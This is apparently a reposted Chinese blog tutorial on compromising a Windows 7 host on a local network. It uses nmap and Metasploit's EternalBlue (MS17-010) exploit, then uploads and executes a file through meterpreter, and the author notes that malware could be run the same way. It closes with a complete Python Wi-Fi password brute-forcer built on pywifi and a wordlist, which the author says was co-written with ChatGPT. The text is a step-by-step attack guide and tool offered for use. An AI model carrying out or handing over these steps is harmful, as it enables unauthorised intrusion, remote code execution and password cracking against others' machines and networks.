提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
前言
提示:这里可以添加本文要记录的大概内容:
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。
提示:以下是本篇文章正文内容,下面案例可供参考
一、信息收集
第一步,信息收集
先查找自己的IP地址以方便查找同局域网的设备
然后使用nmap -O以一个一个扫
看我找到了什么
找到了,正好开放445端口
二、开始入侵
1.启动msfconsole
msfconsole
启动成功了,搜索ms漏洞
2.搜索漏洞
search ms17_010
然后扔给我们这些东西,以前用过的知道该使用哪个
输入:
use exploit/windows/smb/ms17_010_eternalblue
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入options
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
IP一定要设为目标的IP地址,然后我们再options
已经都准备好了,可以进行入侵了,输入
run
[*] Started reverse TCP handler on 192.168.22.13:4444
这串代码讲的是开始反向TCP监听,监听本机的IP和端口
192.168.22.196:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.22.196:445 - Scanned 1 of 1 hosts (100% complete)
这串代码讲的是主机存在漏洞
然后哇啦哇啦,一顿准备
出现win了,已经渗透成功了
3.文件上传
我送给它安装DEV-c++吧
upload /路径/xxx.exe
上传完了,但上传到哪里了呢?
输入pwd
可以看到在system32文件下
让我们运行它
输入
execute -f xxx.exe
-f是运行指定文件
好吧,我的报错了,原因我改了文件,至少远程启动文件了,也可以发送病毒并执行
其他
from tkinter import *
from pywifi import const
import pywifi
import time
def wificonnect(str, wifiname):
# 窗口无线对象
wifi = pywifi.PyWiFi()
# 抓取第一个无线网卡
ifaces = wifi.interfaces()[0]
# 断开所有的wifi
ifaces.disconnect()
time.sleep(0)
if ifaces.status() == const.IFACE_DISCONNECTED:
# 创建wifi连接文件
profile = pywifi.Profile()
profile.ssid = wifiname
# wifi的加密算法
profile.akm.append(const.AKM_TYPE_WPA2PSK)
# wifi的密码
profile.key = str
# 网卡的开发
profile.auth = const.AUTH_ALG_OPEN
# 加密单元,这里需要写点加密单元否则无法连接
profile.cipher = const.CIPHER_TYPE_CCMP
# 删除所有的wifi文件
ifaces.remove_all_network_profiles()
# 设置新的连接文件
tep_profile = ifaces.add_network_profile(profile)
# 连接
ifaces.connect(tep_profile)
time.sleep(1)
if ifaces.status() == const.IFACE_CONNECTED:
return True
else:
return False
def readPwd():
# 获取wifi名称
wifiname = entry.get().strip()
path = r'./pwd.txt'
file = open(path, 'r')
while True:
try:
# 读取
mystr = file.readline().strip()
# 测试连接
bool = wificonnect(mystr, wifiname)
if bool:
text.insert(END, '这个密码是正确的' + mystr)
text.see(END)
text.update()
file.close()
break
else:
text.insert(END, '这个密码是错误的' + mystr)
text.see(END)
text.update()
except:
continue
# 创建窗口
root = Tk()
root.title('wifi万能爆破器')
root.geometry('900x600')
# 标签
label = Label(root, text='输入要爆破的WIFI:')
# 定位
label.grid()
# 输入控件
entry = Entry(root, font=('微软雅黑', 20))
entry.grid(row=0, column=1)
# 列表控件
text = Listbox(root, font=('微软雅黑', 20), width=40, height=10)
text.grid(row=1, columnspan=15)
# 按钮
button = Button(root, text='开始爆破', width=20, height=2, command=readPwd)
button.grid(row=2, columnspan=2)
# 显示窗口
root.mainloop()
既然要联网肯定要联网,废话文学 这是我和chat gpt连夜写的,单纯只是密码爆破,嘿嘿
字典自己准备,网上一大堆,一搜一大把文章来源:https://www.toymoban.com/news/detail-463705.html
总结
本文就是讲解远程控制并执行文件文章来源地址https://www.toymoban.com/news/detail-463705.html
到了这里,关于Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!